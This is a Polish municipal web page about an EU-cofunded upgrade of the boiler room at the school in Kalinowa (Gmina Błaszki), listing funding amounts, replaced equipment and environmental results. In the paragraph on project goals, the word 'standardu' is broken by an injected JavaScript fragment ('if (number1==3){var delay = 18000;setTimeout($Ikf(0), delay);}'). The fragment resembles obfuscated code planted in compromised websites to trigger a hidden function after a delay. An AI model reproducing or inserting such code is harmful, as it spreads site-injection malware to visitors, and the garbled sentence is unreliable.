Modernizacja kotłowni grzewczej na ekologiczną w obiekcie szkolnym w Kalinowej ZPORR – UE

Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Zintegrowanego Programu Operacyjnego Rozwoju Regionalnego
„Modernizacja kotłowni grzewczej na ekologiczną w obiekcie szkolnym w Kalinowej”

Beneficjent Projektu: Gmina i Miasto Błaszki

Dane podstawowe

Nazwa projektu

„Modernizacja kotłowni grzewczej na ekologiczną w obiekcie szkolnym w Kalinowej”

Projektodawca

Gmina i Miasto Błaszki

Fundusz strukturalny

Europejski Fundusz Rozwoju Regionalnego

Program Operacyjny

Zintegrowany Pogram Operacyjny Rozwoju Regionalnego

Nazwa działania

3.1 Obszary wiejskie

Wartość projektu

162 843,06 zł

Numer umowy na dofinansowanie

Z/2.10/III/3.1/41/06/U/384/08

Kwota dofinansowania ze ZPORR

122 132,30 zł

Zasięg geograficzny

Gmina i Miasto Błaszki

Czas trwania realizacji projektu

2006-2007

Cel projektu

Celem zrealizowanego projektu „Modernizacja kotłowni grzewczej na ekologiczną w obiekcie szkolnym w Kalinowej” jest pozytywny wpływ na rozwój społeczno-gospodarczy gminy Błaszki a także podniesienie standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardu życia mieszkańców i poprawa stanu środowiska naturalnego.

Przedmiot i opis projektu

Przedmiotem zrealizowanego projektu była modernizacja kotłowni grzewczej znajdującej się w obiekcie oświatowym w miejscowości Kalinowa na kotłownię ekologiczną opalaną ekogroszkiem. Kotłownia dostarcza energię cieplną wykorzystywaną do ogrzewania pomieszczeń szkolnych, grzania ciepłej wody użytkowej oraz podgrzewania powietrza wentylacyjnego. Zaprojektowano nowoczesne kotły z palnikami do równomiernego spalania opału. Podstawowym paliwem jest ekogroszek. Znak bezpieczeństwa ekologicznego – nr 0039/3 wydany przez Instytut Cemicznej przeróbki Węgla w Zabrzu. Sprawność procesu spalania ustalona jest na 85 %. Zakres modernizacji kotłowni obejmował wymianę:

  • 2 kotłów na kotły typu KTM-150 o mocy 150 kW każdy,
  • komina na dwa stalowe dw= 300mm, h=11 mm,
  • czopucha,
  • naczynia zbiorczego,
  • rur bezpieczeństwa,
  • pomp obiegowych i układów mieszających dla każdego obiektu,
  • wykonania węzła podgrzewania ciepłej wody użytkowej,
  • wykonanie kanałów wentylacyjnych : nawiewnego i wywiewnego,
  • wykonanie węzła sanitarnego, pomieszczenia gaszenia żużla i składu opału.

Rezultaty projektu

Realizacja projektu przyczyniła się do znaczącego zmniejszenia emisji zanieczyszczeń pyłowych do powietrza co pozwoliło osiągnąć wymierny efekt ekologiczny. Poprawiła się jakość istniejącego dobra publicznego a budynek szkoły stał się bardziej przyjazny środowisku. Zwiększona o 35 % sprawność kotłów pozwala odnieść korzyści finansowe płynące z eksploatacji kotłowni. Obecna kotłownia zapewnia większą wartość opałową oraz lepszą sprawność źródła energii cieplnej. Realizacja inwestycji pozwoliła na likwidację źródła niskiej emisji i zastąpienie jej nowoczesną i ekologiczną formą wytwarzania energii cieplnej.

Zarządzanie projektem

Instytucją odpowiedzialną za przygotowanie i realizację Projektu jest Gmina i Miasto Błaszki, reprezentowana przez Burmistrza Krzysztofa Stępińskiego. Na niej też spoczywa obowiązek utrzymania trwałości zrealizowanej inwestycji.

Warto przeczytać

Skip to content